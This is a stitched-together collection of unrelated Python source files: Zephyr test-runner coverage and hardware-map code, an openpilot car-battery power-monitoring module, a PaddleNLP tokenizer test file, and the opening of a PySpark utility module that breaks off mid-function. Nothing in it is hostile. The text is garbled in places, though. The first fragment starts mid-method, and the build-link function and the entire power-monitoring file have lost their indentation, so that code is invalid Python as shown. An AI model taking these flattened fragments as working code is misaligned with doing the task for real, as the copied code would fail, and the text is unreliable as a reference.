    non_skipped = (i for i in self.instances.values() if i.status != "skipped")
    for instance in non_skipped:
        self._create_build_dir_link(links_dir_path, instance)
def _create_build_dir_link(self, links_dir_path, instance):
"""
Create build directory with original "long" path. Next take shorter
path and link them with original path - create link. At the end
replace build_dir to created link. This link will be passed to CMake
command. This action helps to limit path length which can be
significant during building by CMake on Windows OS.
"""
os.makedirs(instance.build_dir, exist_ok=True)
link_name = f"test_{self.link_dir_counter}"
link_path = os.path.join(links_dir_path, link_name)
if os.name == "nt": # if OS is Windows
command = ["mklink", "/J", f"{link_path}", f"{instance.build_dir}"]
subprocess.call(command, shell=True)
else: # for Linux and MAC OS
os.symlink(instance.build_dir, link_path)
# Here original build directory is replaced with symbolic link. It will
# be passed to CMake command
instance.build_dir = link_path
self.link_dir_counter += 1
class CoverageTool:
    """ Base class for every supported coverage tool
    """

    def __init__(self):
        # Set later by the caller: gcov binary to use and the source base
        # directory the subclasses filter against.
        self.gcov_tool = None
        self.base_dir = None

    @staticmethod
    def factory(tool):
        """Instantiate the coverage tool named by ``tool`` ('lcov'/'gcovr').

        Returns None (after logging an error) for unknown tool names.
        """
        if tool == 'lcov':
            chosen = Lcov()
        elif tool == 'gcovr':
            chosen = Gcovr()
        else:
            logger.error("Unsupported coverage tool specified: {}".format(tool))
            return None
        logger.debug(f"Select {tool} as the coverage tool...")
        return chosen

    @staticmethod
    def retrieve_gcov_data(input_file):
        """Extract the {file name: hex dump} coverage mapping from a log.

        Returns a dict with 'complete' (True when the END marker was seen,
        or when no dump started at all) and 'data' (the mapping).
        """
        logger.debug("Working on %s" % input_file)
        extracted_coverage_info = {}
        capture_data = False
        capture_complete = False
        with open(input_file, 'r') as fp:
            for line in fp.readlines():
                if re.search("GCOV_COVERAGE_DUMP_START", line):
                    capture_data = True
                    continue
                if re.search("GCOV_COVERAGE_DUMP_END", line):
                    capture_complete = True
                    break
                # Loop until the coverage data is found.
                if not capture_data:
                    continue
                if not line.startswith("*"):
                    continue
                parts = line.split("<")
                if len(parts) <= 1:
                    continue
                # Strip the leading "*" delimiter and the trailing newline.
                file_name = parts[0][1:]
                hex_dump = parts[1][:-1]
                extracted_coverage_info.update({file_name: hex_dump})
        if not capture_data:
            capture_complete = True
        return {'complete': capture_complete, 'data': extracted_coverage_info}

    @staticmethod
    def create_gcda_files(extracted_coverage_info):
        """Write each captured hex dump back out as a binary .gcda file."""
        logger.debug("Generating gcda files")
        for filename, hexdump_val in extracted_coverage_info.items():
            # if kobject_hash is given for coverage gcovr fails
            # hence skipping it problem only in gcovr v4.1
            if "kobject_hash" in filename:
                filename = (filename[:-4]) + "gcno"
                try:
                    os.remove(filename)
                except Exception:
                    pass
                continue
            with open(filename, 'wb') as fp:
                fp.write(bytes.fromhex(hexdump_val))

    def generate(self, outdir):
        """Collect gcov dumps from every handler.log, then run the tool."""
        for filename in glob.glob("%s/**/handler.log" % outdir, recursive=True):
            gcov_data = self.__class__.retrieve_gcov_data(filename)
            if gcov_data['complete']:
                self.__class__.create_gcda_files(gcov_data['data'])
                logger.debug("Gcov data captured: {}".format(filename))
            else:
                logger.error("Gcov data capture incomplete: {}".format(filename))

        with open(os.path.join(outdir, "coverage.log"), "a") as coveragelog:
            # _generate is provided by the concrete subclass (Lcov/Gcovr).
            if self._generate(outdir, coveragelog) == 0:
                logger.info("HTML report generated: {}".format(
                    os.path.join(outdir, "coverage", "index.html")))
class Lcov(CoverageTool):
    """lcov/genhtml based coverage report generator."""

    def __init__(self):
        super().__init__()
        # Glob-style exclusion patterns collected via add_ignore_*().
        self.ignores = []

    def add_ignore_file(self, pattern):
        """Exclude any path whose name contains ``pattern``."""
        self.ignores.append('*' + pattern + '*')

    def add_ignore_directory(self, pattern):
        """Exclude everything under any directory named ``pattern``."""
        self.ignores.append('*/' + pattern + '/*')

    def _generate(self, outdir, coveragelog):
        """Run lcov capture/extract/remove, then genhtml; return its exit code."""
        coveragefile = os.path.join(outdir, "coverage.info")
        ztestfile = os.path.join(outdir, "ztest.info")

        capture_cmd = ["lcov", "--gcov-tool", self.gcov_tool,
                       "--capture", "--directory", outdir,
                       "--rc", "lcov_branch_coverage=1",
                       "--output-file", coveragefile]
        logger.debug(f"Running {' '.join(capture_cmd)}...")
        subprocess.call(capture_cmd, stdout=coveragelog)

        # We want to remove tests/* and tests/ztest/test/* but save tests/ztest
        subprocess.call(["lcov", "--gcov-tool", self.gcov_tool, "--extract",
                         coveragefile,
                         os.path.join(self.base_dir, "tests", "ztest", "*"),
                         "--output-file", ztestfile,
                         "--rc", "lcov_branch_coverage=1"], stdout=coveragelog)

        if os.path.exists(ztestfile) and os.path.getsize(ztestfile) > 0:
            subprocess.call(["lcov", "--gcov-tool", self.gcov_tool, "--remove",
                             ztestfile,
                             os.path.join(self.base_dir, "tests/ztest/test/*"),
                             "--output-file", ztestfile,
                             "--rc", "lcov_branch_coverage=1"],
                            stdout=coveragelog)
            files = [coveragefile, ztestfile]
        else:
            files = [coveragefile]

        for pattern in self.ignores:
            subprocess.call(
                ["lcov", "--gcov-tool", self.gcov_tool, "--remove",
                 coveragefile, pattern, "--output-file",
                 coveragefile, "--rc", "lcov_branch_coverage=1"],
                stdout=coveragelog)

        # The --ignore-errors source option is added to avoid it exiting due to
        # samples/application_development/external_lib/
        return subprocess.call(["genhtml", "--legend", "--branch-coverage",
                                "--ignore-errors", "source",
                                "-output-directory",
                                os.path.join(outdir, "coverage")] + files,
                               stdout=coveragelog)
class Gcovr(CoverageTool):
    """Coverage backend driving gcovr to produce JSON data and HTML."""

    def __init__(self):
        super().__init__()
        # Regex patterns (gcovr -e syntax) excluded from the report.
        self.ignores = []

    def add_ignore_file(self, pattern):
        # Match the pattern anywhere in a file path.
        self.ignores.append('.*' + pattern + '.*')

    def add_ignore_directory(self, pattern):
        # Match any file below a directory with this name.
        self.ignores.append(".*/" + pattern + '/.*')

    @staticmethod
    def _interleave_list(prefix, items):
        """Return [prefix, items[0], prefix, items[1], ...].

        The second parameter was renamed from ``list`` so it no longer
        shadows the builtin; both call sites pass it positionally.
        """
        return [token for item in items for token in (prefix, item)]

    def _generate(self, outdir, coveragelog):
        """Run gcovr capture + filtering and render HTML.

        Returns gcovr's exit code; all tool output is appended to
        *coveragelog*.
        """
        coveragefile = os.path.join(outdir, "coverage.json")
        ztestfile = os.path.join(outdir, "ztest.json")
        excludes = Gcovr._interleave_list("-e", self.ignores)
        # We want to remove tests/* and tests/ztest/test/* but save tests/ztest
        cmd = ["gcovr", "-r", self.base_dir, "--gcov-executable",
               self.gcov_tool, "-e", "tests/*"] + excludes + ["--json", "-o",
               coveragefile, outdir]
        cmd_str = " ".join(cmd)
        logger.debug(f"Running {cmd_str}...")
        subprocess.call(cmd, stdout=coveragelog)
        # Keep ztest framework coverage, minus its own self-tests.
        subprocess.call(["gcovr", "-r", self.base_dir, "--gcov-executable",
                         self.gcov_tool, "-f", "tests/ztest", "-e",
                         "tests/ztest/test/*", "--json", "-o", ztestfile,
                         outdir], stdout=coveragelog)
        if os.path.exists(ztestfile) and os.path.getsize(ztestfile) > 0:
            files = [coveragefile, ztestfile]
        else:
            files = [coveragefile]
        subdir = os.path.join(outdir, "coverage")
        os.makedirs(subdir, exist_ok=True)
        # Merge the captured tracefiles into a single HTML report.
        tracefiles = self._interleave_list("--add-tracefile", files)
        return subprocess.call(["gcovr", "-r", self.base_dir, "--html",
                                "--html-details"] + tracefiles +
                               ["-o", os.path.join(subdir, "index.html")],
                               stdout=coveragelog)
class DUT(object):
    """A physical device under test attached to the host.

    Holds the serial endpoint, flashing runner and scripting hooks for one
    board. The `available`/`counter` fields are multiprocessing-safe so
    several worker processes can share a device.
    """

    def __init__(self,
                 id=None,
                 serial=None,
                 serial_baud=None,
                 platform=None,
                 product=None,
                 serial_pty=None,
                 connected=False,
                 runner_params=None,
                 pre_script=None,
                 post_script=None,
                 post_flash_script=None,
                 runner=None):
        self.serial = serial
        # Default to the common 115200 baud when none is configured.
        self.baud = serial_baud or 115200
        self.platform = platform
        self.serial_pty = serial_pty
        # Shared-memory ints so availability/usage counts are visible
        # across worker processes.
        self._counter = Value("i", 0)
        self._available = Value("i", 1)
        self.connected = connected
        self.id = id
        self.product = product
        self.runner = runner
        self.runner_params = runner_params
        self.fixtures = []
        self.post_flash_script = post_flash_script
        self.post_script = post_script
        # Fixed: pre_script was assigned twice in the original __init__.
        self.pre_script = pre_script
        self.probe_id = None
        self.notes = None
        self.lock = Lock()
        # Used by HardwareMap.save() to mark devices already merged into
        # an existing hardware map.
        self.match = False

    @property
    def available(self):
        with self._available.get_lock():
            return self._available.value

    @available.setter
    def available(self, value):
        with self._available.get_lock():
            self._available.value = value

    @property
    def counter(self):
        with self._counter.get_lock():
            return self._counter.value

    @counter.setter
    def counter(self, value):
        with self._counter.get_lock():
            self._counter.value = value

    def to_dict(self):
        """Return a dict of truthy public fields (for YAML serialization)."""
        d = {}
        exclude = ['_available', '_counter', 'match']
        v = vars(self)
        for k in v.keys():
            # Falsy values (None, [], False, 0) are deliberately dropped
            # so the serialized map stays minimal.
            if k not in exclude and v[k]:
                d[k] = v[k]
        return d

    def __repr__(self):
        return f"<{self.platform} ({self.product}) on {self.serial}>"
class HardwareMap:
    """Registry of physical boards (DUTs) available for device testing.

    The map can be populated three ways: explicitly via add_device(), from
    a schema-validated YAML file via load(), or by probing connected USB
    serial adapters via scan() and persisting the result with save().
    """

    # Schema used to validate hardware-map YAML files.
    schema_path = os.path.join(ZEPHYR_BASE, "scripts", "schemas", "twister", "hwmap-schema.yaml")

    # USB manufacturer strings of debug probes recognised while scanning.
    manufacturer = [
        'ARM',
        'SEGGER',
        'MBED',
        'STMicroelectronics',
        'Atmel Corp.',
        'Texas Instruments',
        'Silicon Labs',
        'NXP Semiconductors',
        'Microchip Technology Inc.',
        'FTDI',
        'Digilent'
    ]

    # Maps a runner name to the USB product strings (exact names or regex
    # patterns) of the probes that runner can drive.
    runner_mapping = {
        'pyocd': [
            'DAPLink CMSIS-DAP',
            'MBED CMSIS-DAP'
        ],
        'jlink': [
            'J-Link',
            'J-Link OB'
        ],
        'openocd': [
            'STM32 STLink', '^XDS110.*', 'STLINK-V3'
        ],
        'dediprog': [
            'TTL232R-3V3',
            'MCP2200 USB Serial Port Emulator'
        ]
    }

    def __init__(self):
        # Devices found by scan(); duts is the authoritative list used by tests.
        self.detected = []
        self.duts = []

    def add_device(self, serial, platform, pre_script, is_pty, baud=None):
        """Manually register one connected device for *platform*.

        When *is_pty* is true, *serial* names a pty command instead of a
        serial device node.
        """
        device = DUT(platform=platform, connected=True, pre_script=pre_script, serial_baud=baud)
        if is_pty:
            device.serial_pty = serial
        else:
            device.serial = serial
        self.duts.append(device)

    def load(self, map_file):
        """Populate self.duts from a schema-validated hardware-map YAML file."""
        hwm_schema = scl.yaml_load(self.schema_path)
        duts = scl.yaml_load_verify(map_file, hwm_schema)
        for dut in duts:
            pre_script = dut.get('pre_script')
            post_script = dut.get('post_script')
            post_flash_script = dut.get('post_flash_script')
            platform = dut.get('platform')
            id = dut.get('id')
            runner = dut.get('runner')
            runner_params = dut.get('runner_params')
            serial_pty = dut.get('serial_pty')
            serial = dut.get('serial')
            baud = dut.get('baud', None)
            product = dut.get('product')
            fixtures = dut.get('fixtures', [])
            # A device only counts as connected if some serial endpoint exists.
            connected= dut.get('connected') and ((serial or serial_pty) is not None)
            new_dut = DUT(platform=platform,
                          product=product,
                          runner=runner,
                          runner_params=runner_params,
                          id=id,
                          serial_pty=serial_pty,
                          serial=serial,
                          serial_baud=baud,
                          connected=connected,
                          pre_script=pre_script,
                          post_script=post_script,
                          post_flash_script=post_flash_script)
            new_dut.fixtures = fixtures
            new_dut.counter = 0
            self.duts.append(new_dut)

    def scan(self, persistent=False):
        """Probe USB serial adapters and fill self.detected.

        When *persistent* is True (Linux only), record the stable
        /dev/serial/by-id symlink instead of the volatile device node.
        """
        from serial.tools import list_ports

        if persistent and platform.system() == 'Linux':
            # On Linux, /dev/serial/by-id provides symlinks to
            # '/dev/ttyACMx' nodes using names which are unique as
            # long as manufacturers fill out USB metadata nicely.
            #
            # This creates a map from '/dev/ttyACMx' device nodes
            # to '/dev/serial/by-id/usb-...' symlinks. The symlinks
            # go into the hardware map because they stay the same
            # even when the user unplugs / replugs the device.
            #
            # Some inexpensive USB/serial adapters don't result
            # in unique names here, though, so use of this feature
            # requires explicitly setting persistent=True.
            by_id = Path('/dev/serial/by-id')

            def readlink(link):
                return str((by_id / link).resolve())

            persistent_map = {readlink(link): str(link)
                              for link in by_id.iterdir()}
        else:
            persistent_map = {}

        serial_devices = list_ports.comports()
        logger.info("Scanning connected hardware...")
        for d in serial_devices:
            if d.manufacturer in self.manufacturer:
                # TI XDS110 can have multiple serial devices for a single board
                # assume endpoint 0 is the serial, skip all others
                if d.manufacturer == 'Texas Instruments' and not d.location.endswith('0'):
                    continue
                s_dev = DUT(platform="unknown",
                            id=d.serial_number,
                            serial=persistent_map.get(d.device, d.device),
                            product=d.product,
                            runner='unknown',
                            connected=True)

                for runner, _ in self.runner_mapping.items():
                    products = self.runner_mapping.get(runner)
                    if d.product in products:
                        s_dev.runner = runner
                        # NOTE(review): this `continue` moves on to the next
                        # runner even after an exact match; a later match
                        # would overwrite s_dev.runner — confirm intended.
                        continue
                    # Try regex matching
                    for p in products:
                        if re.match(p, d.product):
                            s_dev.runner = runner
                s_dev.connected = True
                s_dev.lock = None
                self.detected.append(s_dev)
            else:
                logger.warning("Unsupported device (%s): %s" % (d.manufacturer, d))

    def save(self, hwm_file):
        """Merge self.detected into *hwm_file*, creating it if needed."""
        # use existing map
        self.detected.sort(key=lambda x: x.serial or '')
        if os.path.exists(hwm_file):
            with open(hwm_file, 'r') as yaml_file:
                hwm = yaml.load(yaml_file, Loader=SafeLoader)
                if hwm:
                    hwm.sort(key=lambda x: x.get('serial', ''))

                    # disconnect everything
                    for h in hwm:
                        h['connected'] = False
                        h['serial'] = None

                    # Re-attach serial ports for devices present now, matching
                    # on (id, product); each detected device is consumed at
                    # most once via its 'match' flag.
                    for _detected in self.detected:
                        for h in hwm:
                            if _detected.id == h['id'] and _detected.product == h['product'] and not _detected.match:
                                h['connected'] = True
                                h['serial'] = _detected.serial
                                _detected.match = True

                # Devices never seen before get appended to the map.
                new_duts = list(filter(lambda d: not d.match, self.detected))
                new = []
                for d in new_duts:
                    new.append(d.to_dict())

                if hwm:
                    hwm = hwm + new
                else:
                    hwm = new

            with open(hwm_file, 'w') as yaml_file:
                yaml.dump(hwm, yaml_file, Dumper=Dumper, default_flow_style=False)

            self.load(hwm_file)
            logger.info("Registered devices:")
            self.dump()
        else:
            # create new file
            dl = []
            for _connected in self.detected:
                platform = _connected.platform
                id = _connected.id
                runner = _connected.runner
                serial = _connected.serial
                product = _connected.product
                d = {
                    'platform': platform,
                    'id': id,
                    'runner': runner,
                    'serial': serial,
                    'product': product,
                    'connected': _connected.connected
                }
                dl.append(d)
            with open(hwm_file, 'w') as yaml_file:
                yaml.dump(dl, yaml_file, Dumper=Dumper, default_flow_style=False)
            logger.info("Detected devices:")
            self.dump(detected=True)

    def dump(self, filtered=[], header=[], connected_only=False, detected=False):
        """Print a table of devices (detected or registered).

        NOTE(review): the mutable default arguments are only read, never
        mutated, so the shared-default pitfall does not bite here.
        """
        print("")
        table = []
        if detected:
            to_show = self.detected
        else:
            to_show = self.duts
        if not header:
            header = ["Platform", "ID", "Serial device"]
        for p in to_show:
            platform = p.platform
            connected = p.connected
            if filtered and platform not in filtered:
                continue
            if not connected_only or connected:
                table.append([platform, p.id, p.serial])
        print(tabulate(table, headers=header, tablefmt="github"))
|
power_monitoring.py
|
import random
import threading
import time
from statistics import mean
from typing import Optional
from cereal import log
from common.params import Params, put_nonblocking
from common.realtime import sec_since_boot
from selfdrive.hardware import HARDWARE
from selfdrive.swaglog import cloudlog
from selfdrive.statsd import statlog
CAR_VOLTAGE_LOW_PASS_K = 0.091 # LPF gain for 5s tau (dt/tau / (dt/tau + 1))
# A C2 uses about 1W while idling, and 30h seens like a good shutoff for most cars
# While driving, a battery charges completely in about 30-60 minutes
CAR_BATTERY_CAPACITY_uWh = 30e6
CAR_CHARGING_RATE_W = 45
VBATT_PAUSE_CHARGING = 11.0 # Lower limit on the LPF car battery voltage
VBATT_INSTANT_PAUSE_CHARGING = 7.0 # Lower limit on the instant car battery voltage measurements to avoid triggering on instant power loss
MAX_TIME_OFFROAD_S = 30*3600
MIN_ON_TIME_S = 3600
class PowerMonitoring:
def __init__(self):
self.params = Params()
self.last_measurement_time = None # Used for integration delta
self.last_save_time = 0 # Used for saving current value in a param
self.power_used_uWh = 0 # Integrated power usage in uWh since going into offroad
self.next_pulsed_measurement_time = None
self.car_voltage_mV = 12e3 # Low-passed version of peripheralState voltage
self.car_voltage_instant_mV = 12e3 # Last value of peripheralState voltage
self.integration_lock = threading.Lock()
self.ts_last_charging_ctrl = None
car_battery_capacity_uWh = self.params.get("CarBatteryCapacity")
if car_battery_capacity_uWh is None:
car_battery_capacity_uWh = 0
# Reset capacity if it's low
self.car_battery_capacity_uWh = max((CAR_BATTERY_CAPACITY_uWh / 10), int(car_battery_capacity_uWh))
# Calculation tick
def calculate(self, peripheralState, ignition):
try:
now = sec_since_boot()
# If peripheralState is None, we're probably not in a car, so we don't care
if peripheralState is None or peripheralState.pandaType == log.PandaState.PandaType.unknown:
with self.integration_lock:
self.last_measurement_time = None
self.next_pulsed_measurement_time = None
self.power_used_uWh = 0
return
# Low-pass battery voltage
self.car_voltage_instant_mV = peripheralState.voltage
self.car_voltage_mV = ((peripheralState.voltage * CAR_VOLTAGE_LOW_PASS_K) + (self.car_voltage_mV * (1 - CAR_VOLTAGE_LOW_PASS_K)))
statlog.gauge("car_voltage", self.car_voltage_mV / 1e3)
# Cap the car battery power and save it in a param every 10-ish seconds
self.car_battery_capacity_uWh = max(self.car_battery_capacity_uWh, 0)
self.car_battery_capacity_uWh = min(self.car_battery_capacity_uWh, CAR_BATTERY_CAPACITY_uWh)
if now - self.last_save_time >= 10:
put_nonblocking("CarBatteryCapacity", str(int(self.car_battery_capacity_uWh)))
self.last_save_time = now
# First measurement, set integration time
with self.integration_lock:
if self.last_measurement_time is None:
self.last_measurement_time = now
return
if ignition:
# If there is ignition, we integrate the charging rate of the car
with self.integration_lock:
self.power_used_uWh = 0
integration_time_h = (now - self.last_measurement_time) / 3600
if integration_time_h < 0:
raise ValueError(f"Negative integration time: {integration_time_h}h")
self.car_battery_capacity_uWh += (CAR_CHARGING_RATE_W * 1e6 * integration_time_h)
self.last_measurement_time = now
else:
# No ignition, we integrate the offroad power used by the device
is_uno = peripheralState.pandaType == log.PandaState.PandaType.uno
# Get current power draw somehow
current_power = HARDWARE.get_current_power_draw() # pylint: disable=assignment-from-none
if current_power is not None:
pass
elif (self.next_pulsed_measurement_time is not None) and (self.next_pulsed_measurement_time <= now):
# TODO: Figure out why this is off by a factor of 3/4???
FUDGE_FACTOR = 1.33
# Turn off charging for about 10 sec in a thread that does not get killed on SIGINT, and perform measurement here to avoid blocking thermal
def perform_pulse_measurement(now):
try:
HARDWARE.set_battery_charging(False)
time.sleep(5)
# Measure for a few sec to get a good average
voltages = []
currents = []
for _ in range(6):
voltages.append(HARDWARE.get_battery_voltage())
currents.append(HARDWARE.get_battery_current())
time.sleep(1)
current_power = ((mean(voltages) / 1000000) * (mean(currents) / 1000000))
self._perform_integration(now, current_power * FUDGE_FACTOR)
# Enable charging again
HARDWARE.set_battery_charging(True)
except Exception:
cloudlog.exception("Pulsed power measurement failed")
# Start pulsed measurement and return
threading.Thread(target=perform_pulse_measurement, args=(now,)).start()
self.next_pulsed_measurement_time = None
return
elif self.next_pulsed_measurement_time is None and not is_uno:
# On a charging EON with black panda, or drawing more than 400mA out of a white/grey one
# Only way to get the power draw is to turn off charging for a few sec and check what the discharging rate is
# We shouldn't do this very often, so make sure it has been some long-ish random time interval
self.next_pulsed_measurement_time = now + random.randint(120, 180)
return
else:
# Do nothing
return
# Do the integration
self._perform_integration(now, current_power)
except Exception:
cloudlog.exception("Power monitoring calculation failed")
def _perform_integration(self, t: float, current_power: float) -> None:
with self.integration_lock:
try:
if self.last_measurement_time:
integration_time_h = (t - self.last_measurement_time) / 3600
power_used = (current_power * 1000000) * integration_time_h
if power_used < 0:
raise ValueError(f"Negative power used! Integration time: {integration_time_h} h Current Power: {power_used} uWh")
self.power_used_uWh += power_used
self.car_battery_capacity_uWh -= power_used
self.last_measurement_time = t
except Exception:
cloudlog.exception("Integration failed")
# Get the power usage
def get_power_used(self) -> int:
return int(self.power_used_uWh)
def get_car_battery_capacity(self) -> int:
return int(self.car_battery_capacity_uWh)
# See if we need to disable charging
def should_disable_charging(self, ignition: bool, in_car: bool, offroad_timestamp: Optional[float]) -> bool:
if offroad_timestamp is None:
return False
now = sec_since_boot()
disable_charging = False
disable_charging |= (now - offroad_timestamp) > MAX_TIME_OFFROAD_S
disable_charging |= (self.car_voltage_mV < (VBATT_PAUSE_CHARGING * 1e3)) and (self.car_voltage_instant_mV > (VBATT_INSTANT_PAUSE_CHARGING * 1e3))
disable_charging |= (self.car_battery_capacity_uWh <= 0)
disable_charging &= not ignition
disable_charging &= (not self.params.get_bool("DisablePowerDown"))
disable_charging &= in_car
disable_charging |= self.params.get_bool("ForcePowerDown")
return disable_charging
# See if we need to shutdown
def should_shutdown(self, peripheralState, ignition, in_car, offroad_timestamp, started_seen):
if offroad_timestamp is None:
return False
now = sec_since_boot()
panda_charging = (peripheralState.usbPowerMode != log.PeripheralState.UsbPowerMode.client)
BATT_PERC_OFF = self.batt_perc_off_auto_power()
should_shutdown = False
# Wait until we have shut down charging before powering down
should_shutdown |= (not panda_charging and self.should_disable_charging(ignition, in_car, offroad_timestamp))
should_shutdown |= ((HARDWARE.get_battery_capacity() < BATT_PERC_OFF) and (not HARDWARE.get_battery_charging()) and ((now - offroad_timestamp) > 30))
should_shutdown &= started_seen or (now > MIN_ON_TIME_S)
return should_shutdown
def charging_ctrl(self, msg, ts, to_discharge, to_charge ):
if self.ts_last_charging_ctrl is None or (ts - self.ts_last_charging_ctrl) >= 300.:
battery_changing = HARDWARE.get_battery_charging()
if self.ts_last_charging_ctrl:
if msg.deviceState.batteryPercent >= to_discharge and battery_changing:
HARDWARE.set_battery_charging(False)
elif msg.deviceState.batteryPercent <= to_charge and not battery_changing:
HARDWARE.set_battery_charging(True)
self.ts_last_charging_ctrl = ts
def batt_perc_off_auto_power(self):
batt_perc_off = 40
if self.params.get_bool("OpkrPowerShutdown"):
batt_perc_off = 70
return batt_perc_off
|
test_tokenizer.py
|
# Copyright (c) 2021 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import numpy as np
import os
from typing import Type, List, Tuple
import shutil
import unittest
from multiprocessing import Process
from tempfile import TemporaryDirectory
from parameterized import parameterized
from paddle import nn
from paddlenlp.transformers.model_utils import PretrainedModel, MODEL_HOME
from paddlenlp.transformers.tokenizer_utils import PretrainedTokenizer
from paddlenlp.transformers import BertTokenizer, BasicTokenizer, WordpieceTokenizer
from paddlenlp.transformers.bert.modeling import BertForPretraining
from paddlenlp.transformers.gpt.modeling import GPTForPretraining
from paddlenlp.transformers.tinybert.modeling import TinyBertForPretraining
from paddlenlp.transformers.bert.tokenizer import BertTokenizer
from paddlenlp.transformers.gpt.tokenizer import GPTTokenizer, GPTChineseTokenizer
from paddlenlp.transformers.tinybert.tokenizer import TinyBertTokenizer
from tests.common_test import CpuCommonTest, CommonTest
from tests.util import slow, assert_raises
class FakePretrainedModel(PretrainedModel):
    """Minimal stand-in model used to exercise save/load round-trips."""

    def __init__(self):
        super().__init__()
        # A tiny layer so the model carries at least one parameter.
        self.linear = nn.Linear(2, 2)

    def forward(self, *args, **kwargs):
        # Deliberately a no-op; tests only cover (de)serialization.
        pass
def get_pretrained_models_params() -> List[Tuple[str, Type[PretrainedModel]]]:
    """get all of pretrained model names in some PretrainedModels

    Returns:
        List[Tuple[str, Type[PretrainedModel]]]: the parameters of unit test method
    """
    model_types: List[PretrainedModel] = [
        BertForPretraining, GPTForPretraining, TinyBertForPretraining
    ]
    # Pair every registered checkpoint name with its model class.
    return [
        [model_name, ModelType]
        for ModelType in model_types
        for model_name in ModelType.pretrained_resource_files_map.get(
            'model_state', {}).keys()
    ]
def get_pretrained_tokenzier_params(
) -> List[Tuple[str, Type[PretrainedTokenizer]]]:
    """get all of pretrained tokenzier names in some PretrainedTokenzier

    Returns:
        List[Tuple[str, Type[PretrainedTokenzier]]]: the parameters of unit test method
    """
    tokenizer_types: List[PretrainedTokenizer] = [
        BertTokenizer, GPTTokenizer, GPTChineseTokenizer, TinyBertTokenizer
    ]
    # Pair every registered vocab name with its tokenizer class.
    return [
        [model_name, TokenizerType]
        for TokenizerType in tokenizer_types
        for model_name in TokenizerType.pretrained_resource_files_map.get(
            'vocab_file', {}).keys()
    ]
class TestPretrainedFromPretrained(CpuCommonTest):
    """module for test pretrained model"""

    def setUp(self):
        # Save a fake model once so every test can load it from disk.
        self.temp_dir = TemporaryDirectory()
        model = FakePretrainedModel()
        model.save_pretrained(self.temp_dir.name)

    def do_pretrained_in_process(self):
        FakePretrainedModel.from_pretrained(self.temp_dir.name)

    @parameterized.expand([(1, ), (8, ), (20, ), (50, ), (100, ), (1000, )])
    def test_model_config_writing(self, process_num: int):
        # Load the model from many processes at once to exercise the
        # config-file read/write race.
        processes = []
        for _ in range(process_num):
            process = Process(target=self.do_pretrained_in_process)
            process.start()
            processes.append(process)
        # Fix: the original never joined the children, so the test could
        # finish before they ran — and pass even if they crashed.
        for process in processes:
            process.join()
            self.assertEqual(process.exitcode, 0)

    @parameterized.expand(get_pretrained_models_params())
    def test_pretrained_model(self, model_name: str,
                              PretrainedModelClass: Type[PretrainedModel]):
        """stupid test"""
        cache_dir = os.path.join(MODEL_HOME, model_name)
        shutil.rmtree(cache_dir, ignore_errors=True)
        model: PretrainedModelClass = PretrainedModelClass.from_pretrained(
            model_name)
        # Downloading must have populated the cache with the model config.
        self.assertTrue(
            os.path.exists(os.path.join(cache_dir, model.model_config_file)))

        # TODO(wj-Mcat): make this test code pass
        # from pretrained from the dir
        # PretrainedModelClass.from_pretrained(cache_dir)

        # remove the cache model file
        shutil.rmtree(cache_dir, ignore_errors=True)

    @parameterized.expand(get_pretrained_tokenzier_params())
    def test_pretrained_tokenizer(
            self, tokenizer_name: str,
            PretrainedTokenzierClass: Type[PretrainedTokenizer]):
        """stupid test on the pretrained tokenzier"""
        cache_dir = os.path.join(MODEL_HOME, tokenizer_name)
        shutil.rmtree(cache_dir, ignore_errors=True)
        tokenizer: PretrainedTokenzierClass = PretrainedTokenzierClass.from_pretrained(
            tokenizer_name)
        files = os.listdir(cache_dir)
        # The config and every declared resource file must be cached.
        self.assertTrue(
            os.path.exists(
                os.path.join(cache_dir, tokenizer.tokenizer_config_file)))
        for resource_file_name in tokenizer.resource_files_names.values():
            self.assertTrue(
                os.path.exists(os.path.join(cache_dir, resource_file_name)))

        # TODO(wj-Mcat): make this test code pass
        # from_pretrained from the dir
        # PretrainedTokenzierClass.from_pretrained(cache_dir)

        # remove the cache model file
        shutil.rmtree(cache_dir, ignore_errors=True)
|
util.py
|
# -*- coding: utf-8 -*-
#
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import functools
import itertools
import os
import platform
import re
import sys
import threading
import traceback
from types import TracebackType
from typing import Any, Callable, Iterator, List, Optional, TextIO, Tuple
from py4j.clientserver import ClientServer # type: ignore[import]
__all__: List[str] = []
from py4j.java_gateway import JavaObject
def print_exec(stream: TextIO) -> None:
    """Print the traceback of the exception being handled to *stream*."""
    exc_type, exc_value, exc_tb = sys.exc_info()
    traceback.print_exception(exc_type, exc_value, exc_tb, None, stream)
class VersionUtils:
    """
    Utility for extracting version components from Spark version strings.
    """

    @staticmethod
    def majorMinorVersion(sparkVersion: str) -> Tuple[int, int]:
        """
        Return the (major, minor) version numbers parsed from *sparkVersion*.
        E.g., for 2.0.1-SNAPSHOT, return (2, 0).

        Examples
        --------
        >>> sparkVersion = "2.4.0"
        >>> VersionUtils.majorMinorVersion(sparkVersion)
        (2, 4)
        >>> sparkVersion = "2.3.0-SNAPSHOT"
        >>> VersionUtils.majorMinorVersion(sparkVersion)
        (2, 3)
        """
        match = re.search(r"^(\d+)\.(\d+)(\..*)?$", sparkVersion)
        if match is None:
            raise ValueError(
                "Spark tried to parse '%s' as a Spark" % sparkVersion
                + " version string, but it could not find the major and minor"
                + " version numbers."
            )
        major, minor = match.group(1), match.group(2)
        return (int(major), int(minor))
def fail_on_stopiteration(f: Callable) -> Callable:
    """
    Return a wrapper around ``f`` that converts an escaping ``StopIteration``
    into a ``RuntimeError``. This prevents silent loss of data when ``f`` is
    used in a for loop in Spark code.
    """

    def wrapper(*args: Any, **kwargs: Any) -> Any:
        try:
            return f(*args, **kwargs)
